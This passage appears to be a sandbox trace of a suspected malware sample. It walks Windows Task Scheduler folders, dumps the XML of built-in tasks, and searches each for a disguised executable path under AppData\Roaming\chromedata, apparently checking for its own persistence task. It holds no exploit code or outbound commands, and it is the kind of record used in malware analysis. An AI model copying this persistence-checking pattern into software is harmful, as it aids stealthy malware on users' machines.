<UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.295] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;GRGWGX;;;LS)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1000)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1001)</Author>\r\n    <URI>Microsoft\\Windows\\SideShow\\SystemDataProviders</URI>\r\n    <Date>2005-10-01T00:00:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\System32\\AuxiliaryDisplayServices.dll,-1200)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings />\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{7CCA6768-8373-4D28-8876-83E8B4E3A969}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.326] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.326] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.326] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0100.327] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.327] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.327] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.327] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1f, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.327] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea8) returned 0x0
	[0100.329] IRegisteredTaskCollection:get_Count (in: This=0x63fea8, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.329] IRegisteredTaskCollection:get_Item (in: This=0x63fea8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1690048) returned 0x0
	[0100.329] IRegisteredTask:get_Name (in: This=0x1690048, pName=0x128e3c | out: pName=0x128e3c*="SvcRestartTask") returned 0x0
	[0100.329] IRegisteredTask:get_Xml (in: This=0x1690048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.333] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\SoftwareProtectionPlatform\\SvcRestartTask</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-80-123231216-2592883651-3715271367-3753151631-4175906628)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sppc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\sppc.dll,-200)</Author>\r\n    <Description>$(@%systemroot%\\system32\\sppc.dll,-201)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>start sppsvc</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.364] IUnknown:Release (This=0x1690048) returned 0x0
	[0100.364] IUnknown:Release (This=0x63fea8) returned 0x0
	[0100.364] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea8) returned 0x0
	[0100.365] ITaskFolderCollection:get_Count (in: This=0x63fea8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.365] IUnknown:Release (This=0x63fea8) returned 0x0
	[0100.365] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.365] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x20, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.365] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0100.366] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0100.366] IUnknown:Release (This=0x63fe88) returned 0x0
	[0100.366] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0100.367] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.367] IUnknown:Release (This=0x63fe88) returned 0x0
	[0100.367] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.367] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x21, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.367] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe40) returned 0x0
	[0100.369] IRegisteredTaskCollection:get_Count (in: This=0x63fe40, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.369] IRegisteredTaskCollection:get_Item (in: This=0x63fe40, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff38) returned 0x0
	[0100.369] IRegisteredTask:get_Name (in: This=0x63ff38, pName=0x128e3c | out: pName=0x128e3c*="SR") returned 0x0
	[0100.369] IRegisteredTask:get_Xml (in: This=0x63ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.372] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\srrstr.dll,-320)</Source>\r\n    <Author>$(@%systemroot%\\system32\\srrstr.dll,-321)</Author>\r\n    <Description>$(@%systemroot%\\system32\\srrstr.dll,-322)</Description>\r\n    <URI>Microsoft\\Windows\\SystemRestore\\SR</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"SRCalendarTrigger\">\r\n      <StartBoundary>2005-06-14T00:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n    <BootTrigger id=\"SRBootTrigger\">\r\n      <Delay>PT30M</Delay>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>/d srrstr.dll,ExecuteScheduledSPPCreation</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.409] IUnknown:Release (This=0x63ff38) returned 0x0
	[0100.409] IUnknown:Release (This=0x63fe40) returned 0x0
	[0100.409] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe40) returned 0x0
	[0100.410] ITaskFolderCollection:get_Count (in: This=0x63fe40, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.410] IUnknown:Release (This=0x63fe40) returned 0x0
	[0100.410] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.410] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x22, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.410] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0100.412] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.412] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0100.412] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="Interactive") returned 0x0
	[0100.412] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.414] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\wdc.dll,-10041)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\wdc.dll,-10042)</Source>\r\n    <URI>Microsoft\\Windows\\Task Manager\\Interactive</URI>\r\n    <Description>$(@%systemroot%\\system32\\wdc.dll,-10043)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <Priority>5</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{855fec53-d2e4-4999-9e87-3414e9cf0ff4}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.436] IUnknown:Release (This=0x63ff70) returned 0x0
	[0100.436] IUnknown:Release (This=0x63fe88) returned 0x0
	[0100.436] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0100.436] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.437] IUnknown:Release (This=0x63fe88) returned 0x0
	[0100.437] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.437] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x23, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.437] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0100.439] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0100.439] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.439] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict1") returned 0x0
	[0100.439] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.442] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict1</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"9f81d7ff-8026-44de-94b1-14321e8b9641\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4198]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    